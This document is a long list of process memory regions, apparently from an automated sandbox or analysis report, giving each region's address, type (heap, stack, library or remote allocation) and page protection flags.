23A38EE0000
|
trusted library allocation
|
page read and write
|
||
155AB0B2000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
293D0FD000
|
stack
|
page read and write
|
||
20FEC18D000
|
heap
|
page read and write
|
||
1208CB83000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
23A52FFF000
|
heap
|
page read and write
|
||
9ED7178000
|
stack
|
page read and write
|
||
1EA3EFFC000
|
trusted library allocation
|
page read and write
|
||
1EA3EF0E000
|
heap
|
page read and write
|
||
1B993C84000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
168ABBBA000
|
heap
|
page read and write
|
||
B51DBBE000
|
stack
|
page read and write
|
||
2102CDE5000
|
heap
|
page read and write
|
||
2102E965000
|
trusted library allocation
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
D32E9FE000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
59519F8000
|
stack
|
page read and write
|
||
20FEA080000
|
heap
|
page read and write
|
||
1AFAF91C000
|
heap
|
page read and write
|
||
1C29A994000
|
heap
|
page read and write
|
||
168ABBF1000
|
heap
|
page read and write
|
||
29B18A3A000
|
heap
|
page read and write
|
||
1B993C9D000
|
trusted library allocation
|
page read and write
|
||
E0931CE000
|
stack
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
20FEA0D0000
|
heap
|
page read and write
|
||
1B9A3911000
|
trusted library allocation
|
page read and write
|
||
1311D478000
|
trusted library allocation
|
page read and write
|
||
155C5270000
|
heap
|
page execute and read and write
|
||
BB454FE000
|
stack
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
23A38D5A000
|
heap
|
page read and write
|
||
168A3710000
|
trusted library allocation
|
page read and write
|
||
24EFFB55000
|
heap
|
page read and write
|
||
9ED72FB000
|
stack
|
page read and write
|
||
16891C1C000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
D32E97B000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
21CEFB30000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
29B1A385000
|
heap
|
page read and write
|
||
1EA3EC57000
|
heap
|
page execute and read and write
|
||
24E9A002000
|
heap
|
page read and write
|
||
21CEFBD8000
|
heap
|
page read and write
|
||
29B189C2000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
24E81970000
|
trusted library allocation
|
page read and write
|
||
293D53E000
|
stack
|
page read and write
|
||
1C282D04000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
2102EA7A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1EA4EFB0000
|
trusted library allocation
|
page read and write
|
||
2905F5F1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
29B1BD33000
|
trusted library allocation
|
page read and write
|
||
53E18FB000
|
stack
|
page read and write
|
||
2216C700000
|
heap
|
page read and write
|
||
2102E921000
|
trusted library allocation
|
page read and write
|
||
1AFAF93C000
|
heap
|
page read and write
|
||
16E6F990000
|
heap
|
page execute and read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
E09377E000
|
stack
|
page read and write
|
||
20FEC17E000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
20FEC49C000
|
heap
|
page read and write
|
||
23A38F00000
|
heap
|
page execute and read and write
|
||
20FEA370000
|
heap
|
page read and write
|
||
1C282CC7000
|
trusted library allocation
|
page read and write
|
||
29B32E60000
|
heap
|
page read and write
|
||
1AFAF9A0000
|
heap
|
page read and write
|
||
D32E47F000
|
unkown
|
page read and write
|
||
29060C56000
|
trusted library allocation
|
page read and write
|
||
29B1A2E0000
|
trusted library allocation
|
page read and write
|
||
29B1A2C0000
|
trusted library allocation
|
page read and write
|
||
1B9ABCE0000
|
heap
|
page read and write
|
||
155C50DF000
|
heap
|
page read and write
|
||
4459E7F000
|
stack
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
D32E1FE000
|
stack
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
29060DA0000
|
trusted library allocation
|
page read and write
|
||
13CEBF6000
|
stack
|
page read and write
|
||
1311DA23000
|
trusted library allocation
|
page read and write
|
||
2216C844000
|
heap
|
page read and write
|
||
2102EA22000
|
trusted library allocation
|
page read and write
|
||
5B0ED8A000
|
stack
|
page read and write
|
||
1B9ABD61000
|
heap
|
page read and write
|
||
1311D185000
|
heap
|
page read and write
|
||
44599CE000
|
stack
|
page read and write
|
||
13CEAFE000
|
stack
|
page read and write
|
||
16E004A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D8000
|
trusted library allocation
|
page read and write
|
||
9ED727E000
|
stack
|
page read and write
|
||
1B991FE5000
|
heap
|
page read and write
|
||
1B993DE8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
23A52CF9000
|
heap
|
page read and write
|
||
168951DA000
|
trusted library allocation
|
page read and write
|
||
1EA3F392000
|
trusted library allocation
|
page read and write
|
||
21CEFAC3000
|
heap
|
page read and write
|
||
1AFAD6D1000
|
heap
|
page read and write
|
||
E09357E000
|
stack
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1DBF8088000
|
heap
|
page read and write
|
||
16E6D910000
|
heap
|
page read and write
|
||
21CEFA30000
|
heap
|
page read and write
|
||
1EA3EEC3000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1EA3F0B2000
|
trusted library allocation
|
page read and write
|
||
1C292821000
|
trusted library allocation
|
page read and write
|
||
16E6FC50000
|
heap
|
page read and write
|
||
1C280850000
|
heap
|
page read and write
|
||
2905D5D0000
|
trusted library allocation
|
page read and write
|
||
1AFAF93C000
|
heap
|
page read and write
|
||
B51D673000
|
stack
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
1E0A0FB000
|
stack
|
page read and write
|
||
23A3AD90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
168A3853000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1AFAF60D000
|
heap
|
page read and write
|
||
D22B479000
|
stack
|
page read and write
|
||
2905D520000
|
heap
|
page read and write
|
||
24E81C30000
|
trusted library allocation
|
page read and write
|
||
120A6BE9000
|
heap
|
page read and write
|
||
20F90011000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
E093B7F000
|
stack
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
2102CD9C000
|
heap
|
page read and write
|
||
1EA3F00F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
23A52D12000
|
heap
|
page read and write
|
||
9ED6DFE000
|
stack
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
120A6B46000
|
heap
|
page execute and read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
165BD7E000
|
stack
|
page read and write
|
||
20FEC18F000
|
heap
|
page read and write
|
||
1311D469000
|
trusted library allocation
|
page read and write
|
||
29B1A9E2000
|
trusted library allocation
|
page read and write
|
||
23A3AD98000
|
trusted library allocation
|
page read and write
|
||
1311B6E0000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
13CE9FF000
|
stack
|
page read and write
|
||
1311D350000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
29B1BDB5000
|
trusted library allocation
|
page read and write
|
||
16E6D96C000
|
heap
|
page read and write
|
||
1B993E3F000
|
trusted library allocation
|
page read and write
|
||
1311D3F4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
20FEA0F6000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1311D5EA000
|
trusted library allocation
|
page read and write
|
||
168942CB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
16E6D8D0000
|
heap
|
page read and write
|
||
7FFD9B768000
|
trusted library allocation
|
page read and write
|
||
5B0F8FF000
|
stack
|
page read and write
|
||
155AB240000
|
trusted library allocation
|
page read and write
|
||
1311D3AF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
29B18C5E000
|
heap
|
page read and write
|
||
2102E910000
|
heap
|
page read and write
|
||
BB45578000
|
stack
|
page read and write
|
||
1E0A278000
|
stack
|
page read and write
|
||
13CE8FF000
|
stack
|
page read and write
|
||
21CED917000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
1208E740000
|
heap
|
page read and write
|
||
155C5078000
|
heap
|
page read and write
|
||
21046C60000
|
heap
|
page read and write
|
||
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
1208E844000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
16E00088000
|
trusted library allocation
|
page read and write
|
||
29060C2A000
|
trusted library allocation
|
page read and write
|
||
1311D814000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
16891C3D000
|
heap
|
page read and write
|
||
2216C846000
|
heap
|
page read and write
|
||
BB458BE000
|
stack
|
page read and write
|
||
16E6D8F0000
|
heap
|
page read and write
|
||
13135920000
|
heap
|
page execute and read and write
|
||
20FEC366000
|
heap
|
page execute and read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
20F9007C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
F5DB7F000
|
stack
|
page read and write
|
||
293D4BC000
|
stack
|
page read and write
|
||
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
1DBF9B00000
|
heap
|
page read and write
|
||
168ABC5C000
|
heap
|
page read and write
|
||
293D07F000
|
stack
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
16E6D9DC000
|
heap
|
page read and write
|
||
5B0F6FD000
|
stack
|
page read and write
|
||
24E81B67000
|
trusted library allocation
|
page read and write
|
||
1AFAF93C000
|
heap
|
page read and write
|
||
2905EEC0000
|
heap
|
page execute and read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1B991D8E000
|
heap
|
page read and write
|
||
B51DCBE000
|
stack
|
page read and write
|
||
21CED93A000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
24E99E40000
|
heap
|
page read and write
|
||
16E6FA02000
|
heap
|
page read and write
|
||
B51D8FE000
|
stack
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
168AB6A5000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
21CEFAF0000
|
heap
|
page read and write
|
||
1208E83E000
|
trusted library allocation
|
page read and write
|
||
1208CA20000
|
heap
|
page read and write
|
||
1208CD60000
|
trusted library allocation
|
page read and write
|
||
1EA3D545000
|
heap
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
29B1A491000
|
trusted library allocation
|
page read and write
|
||
155AB0F8000
|
heap
|
page read and write
|
||
2905D560000
|
heap
|
page read and write
|
||
155AB280000
|
heap
|
page execute and read and write
|
||
21CEFAD0000
|
heap
|
page read and write
|
||
155C52D2000
|
heap
|
page read and write
|
||
23A52D21000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
1EA3D180000
|
heap
|
page read and write
|
||
B51D9FE000
|
stack
|
page read and write
|
||
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1B991EDA000
|
heap
|
page read and write
|
||
20FEC390000
|
heap
|
page read and write
|
||
E093473000
|
stack
|
page read and write
|
||
24E99FF0000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1311B760000
|
heap
|
page read and write
|
||
293D1FE000
|
stack
|
page read and write
|
||
2102CDE3000
|
heap
|
page read and write
|
||
F5DEFD000
|
stack
|
page read and write
|
||
1311B7BC000
|
heap
|
page read and write
|
||
1E0A37B000
|
stack
|
page read and write
|
||
20FEC4B3000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
1AFAF9A1000
|
heap
|
page read and write
|
||
7FFD9B9DE000
|
trusted library allocation
|
page read and write
|
||
23A53240000
|
heap
|
page read and write
|
||
BB4573C000
|
stack
|
page read and write
|
||
E5F7AFE000
|
stack
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
2905D590000
|
heap
|
page read and write
|
||
1208CA50000
|
heap
|
page read and write
|
||
1B9A3981000
|
trusted library allocation
|
page read and write
|
||
29B1BD2F000
|
trusted library allocation
|
page read and write
|
||
1B993DA4000
|
trusted library allocation
|
page read and write
|
||
1C2808CA000
|
heap
|
page read and write
|
||
168ABEE0000
|
heap
|
page read and write
|
||
B51DDBE000
|
stack
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
1AFAF6A0000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
1311B6C0000
|
heap
|
page read and write
|
||
293D63E000
|
stack
|
page read and write
|
||
1B991D15000
|
heap
|
page read and write
|
||
5951293000
|
stack
|
page read and write
|
||
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
155C5050000
|
heap
|
page read and write
|
||
24E81C2D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
9ED6FFC000
|
stack
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
1312D3E1000
|
trusted library allocation
|
page read and write
|
||
155C5088000
|
heap
|
page read and write
|
||
E0937FE000
|
stack
|
page read and write
|
||
1208E751000
|
trusted library allocation
|
page read and write
|
||
23A38FC0000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
21CED93C000
|
heap
|
page read and write
|
||
29B32AC0000
|
heap
|
page read and write
|
||
21CEDC40000
|
heap
|
page read and write
|
||
24EFFEB0000
|
heap
|
page read and write
|
||
F5DAFF000
|
stack
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
84FAB3A000
|
stack
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1311B79E000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
165BEFE000
|
stack
|
page read and write
|
||
21CEF731000
|
heap
|
page read and write
|
||
16E6DC80000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
960000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
1208E761000
|
trusted library allocation
|
page read and write
|
||
B51DE3C000
|
stack
|
page read and write
|
||
20FEA2D0000
|
trusted library allocation
|
page read and write
|
||
24E9A00F000
|
heap
|
page read and write
|
||
1AFAFA48000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
24E99E57000
|
heap
|
page read and write
|
||
29077954000
|
heap
|
page read and write
|
||
1C280913000
|
heap
|
page read and write
|
||
84FB1FE000
|
stack
|
page read and write
|
||
2102CDA4000
|
heap
|
page read and write
|
||
BB4583E000
|
stack
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
1311B7E4000
|
heap
|
page read and write
|
||
BB453FE000
|
stack
|
page read and write
|
||
2216E9C3000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
2216C8BB000
|
heap
|
page read and write
|
||
155ACD1F000
|
trusted library allocation
|
page read and write
|
||
23A52FB4000
|
heap
|
page read and write
|
||
F5E07F000
|
stack
|
page read and write
|
||
1EA3F446000
|
trusted library allocation
|
page read and write
|
||
23A3B31B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA19000
|
trusted library allocation
|
page read and write
|
||
23A3AD36000
|
trusted library allocation
|
page read and write
|
||
2102CE60000
|
heap
|
page read and write
|
||
C7B17F000
|
stack
|
page read and write
|
||
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
16E00049000
|
trusted library allocation
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
24099985000
|
heap
|
page read and write
|
||
16E000F6000
|
trusted library allocation
|
page read and write
|
||
24E819E0000
|
heap
|
page execute and read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
1AFAD6F4000
|
heap
|
page read and write
|
||
2905EF00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
21CEFAC3000
|
heap
|
page read and write
|
||
59526CE000
|
stack
|
page read and write
|
||
24EFFF64000
|
heap
|
page read and write
|
||
155ACC90000
|
trusted library allocation
|
page read and write
|
||
24E81FB6000
|
trusted library allocation
|
page read and write
|
||
24EFFB8C000
|
heap
|
page read and write
|
||
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
53E16FE000
|
stack
|
page read and write
|
||
23A38EC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
1C282917000
|
trusted library allocation
|
page read and write
|
||
1208E79E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
16891C23000
|
heap
|
page read and write
|
||
1AFAF910000
|
heap
|
page read and write
|
||
1AFAF91D000
|
heap
|
page read and write
|
||
29B18A37000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
290608BB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
16E00147000
|
trusted library allocation
|
page read and write
|
||
20FEA1B4000
|
heap
|
page read and write
|
||
16E6FC60000
|
heap
|
page read and write
|
||
21CEFB31000
|
heap
|
page read and write
|
||
2905D693000
|
heap
|
page read and write
|
||
478000
|
remote allocation
|
page execute and read and write
|
||
1EA3D1BE000
|
heap
|
page read and write
|
||
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
2216E931000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
595139F000
|
stack
|
page read and write
|
||
13135A30000
|
heap
|
page read and write
|
||
9ED6CFE000
|
stack
|
page read and write
|
||
29B189F6000
|
heap
|
page read and write
|
||
1DBF80EA000
|
heap
|
page read and write
|
||
2905D618000
|
heap
|
page read and write
|
||
1AFAD6F6000
|
heap
|
page read and write
|
||
1311D180000
|
heap
|
page read and write
|
||
1C282926000
|
trusted library allocation
|
page read and write
|
||
1208CB28000
|
heap
|
page read and write
|
||
23A38D69000
|
heap
|
page read and write
|
||
16E00103000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
2905D6F4000
|
heap
|
page read and write
|
||
1B9A3920000
|
trusted library allocation
|
page read and write
|
||
20FEBD10000
|
heap
|
page read and write
|
||
16891DF3000
|
trusted library allocation
|
page read and write
|
||
16891C68000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
165BA72000
|
stack
|
page read and write
|
||
293D6BB000
|
stack
|
page read and write
|
||
29B2A491000
|
trusted library allocation
|
page read and write
|
||
16893657000
|
heap
|
page execute and read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1C2808D1000
|
heap
|
page read and write
|
||
1311B880000
|
trusted library allocation
|
page read and write
|
||
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
21046E20000
|
heap
|
page execute and read and write
|
||
155AB030000
|
heap
|
page read and write
|
||
B51DA78000
|
stack
|
page read and write
|
||
21046CA8000
|
heap
|
page read and write
|
||
1E0A076000
|
stack
|
page read and write
|
||
2905D695000
|
heap
|
page read and write
|
||
21CED950000
|
heap
|
page read and write
|
||
20FEC19B000
|
heap
|
page read and write
|
||
23A38D00000
|
heap
|
page read and write
|
||
23A52D57000
|
heap
|
page read and write
|
||
BB452FE000
|
stack
|
page read and write
|
||
24E91B41000
|
trusted library allocation
|
page read and write
|
||
1311D466000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA41000
|
trusted library allocation
|
page read and write
|
||
24E824AC000
|
trusted library allocation
|
page read and write
|
||
1B9943DA000
|
trusted library allocation
|
page read and write
|
||
155ACC10000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
16E6F2D5000
|
heap
|
page read and write
|
||
23A52FFB000
|
heap
|
page read and write
|
||
29B1A946000
|
trusted library allocation
|
page read and write
|
||
1C282D0C000
|
trusted library allocation
|
page read and write
|
||
1AFAF926000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
20FEA300000
|
heap
|
page readonly
|
||
24E91BA2000
|
trusted library allocation
|
page read and write
|
||
1AFAF927000
|
heap
|
page read and write
|
||
29B18A0E000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
168ABC20000
|
heap
|
page read and write
|
||
1EA3F9D5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
DBB000
|
stack
|
page read and write
|
||
2216E730000
|
heap
|
page read and write
|
||
1208CB8E000
|
heap
|
page read and write
|
||
BB4547E000
|
stack
|
page read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
24099964000
|
heap
|
page read and write
|
||
20FEBD1A000
|
heap
|
page read and write
|
||
D32E5FD000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
29B32BFC000
|
heap
|
page read and write
|
||
1AFAFA47000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1B9943B5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
21CEDC45000
|
heap
|
page read and write
|
||
1C2826C0000
|
heap
|
page execute and read and write
|
||
16E6FA3B000
|
heap
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
29B1BAB7000
|
trusted library allocation
|
page read and write
|
||
E0946CD000
|
stack
|
page read and write
|
||
16E000F9000
|
trusted library allocation
|
page read and write
|
||
84FAEFF000
|
stack
|
page read and write
|
||
1320000
|
heap
|
page read and write
|
||
120A6F50000
|
heap
|
page read and write
|
||
21CEFA31000
|
heap
|
page read and write
|
||
F5D783000
|
stack
|
page read and write
|
||
A052FE000
|
stack
|
page read and write
|
||
1C280AF0000
|
heap
|
page read and write
|
||
155C52CC000
|
heap
|
page read and write
|
||
21CEFA9F000
|
heap
|
page read and write
|
||
7FFD9BA34000
|
trusted library allocation
|
page read and write
|
||
23A3ABDE000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
D22C1CE000
|
stack
|
page read and write
|
||
168ABB60000
|
heap
|
page read and write
|
||
1E09C7F000
|
unkown
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
2102EA1F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
20FEA154000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
4459C7F000
|
stack
|
page read and write
|
||
1EA3D4F0000
|
heap
|
page read and write
|
||
2102E96C000
|
trusted library allocation
|
page read and write
|
||
20F81458000
|
trusted library allocation
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
155AD2EA000
|
trusted library allocation
|
page read and write
|
||
1311D3CD000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1AFAF969000
|
heap
|
page read and write
|
||
1208CB25000
|
heap
|
page read and write
|
||
21046E30000
|
heap
|
page read and write
|
||
29B18C50000
|
heap
|
page read and write
|
||
21CEFB00000
|
heap
|
page read and write
|
||
20FEA10F000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
16E00450000
|
trusted library allocation
|
page read and write
|
||
2905F3C1000
|
trusted library allocation
|
page read and write
|
||
1AFAF60D000
|
heap
|
page read and write
|
||
20FEBCA0000
|
heap
|
page execute and read and write
|
||
D22B072000
|
stack
|
page read and write
|
||
D22B67F000
|
stack
|
page read and write
|
||
1B991F10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
392D000
|
stack
|
page read and write
|
||
D22B4F8000
|
stack
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
29B18970000
|
heap
|
page read and write
|
||
D32F5CE000
|
stack
|
page read and write
|
||
24E81B20000
|
heap
|
page read and write
|
||
21CEF730000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
21CEFAA5000
|
heap
|
page read and write
|
||
9ED7CCE000
|
stack
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1AFAF5A6000
|
heap
|
page read and write
|
||
21CEFAA6000
|
heap
|
page read and write
|
||
155ACC25000
|
heap
|
page read and write
|
||
21CEFAA9000
|
heap
|
page read and write
|
||
1AFAD6C0000
|
heap
|
page read and write
|
||
E0935FE000
|
stack
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
2905D66B000
|
heap
|
page read and write
|
||
D22B3FF000
|
stack
|
page read and write
|
||
16E10001000
|
trusted library allocation
|
page read and write
|
||
1311B7AA000
|
heap
|
page read and write
|
||
F5DF7B000
|
stack
|
page read and write
|
||
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
293D5BE000
|
stack
|
page read and write
|
||
1AFAD965000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
2906F572000
|
trusted library allocation
|
page read and write
|
||
1C292893000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
20FEBBC0000
|
heap
|
page execute and read and write
|
||
29B2A50B000
|
trusted library allocation
|
page read and write
|
||
1208CA30000
|
heap
|
page read and write
|
||
2216EA06000
|
heap
|
page read and write
|
||
1311B84F000
|
heap
|
page read and write
|
||
1B994602000
|
trusted library allocation
|
page read and write
|
||
2102EA18000
|
trusted library allocation
|
page read and write
|
||
16E6D8C0000
|
heap
|
page read and write
|
||
155ACD3A000
|
trusted library allocation
|
page read and write
|
||
16E6F996000
|
heap
|
page execute and read and write
|
||
29B1A9E4000
|
trusted library allocation
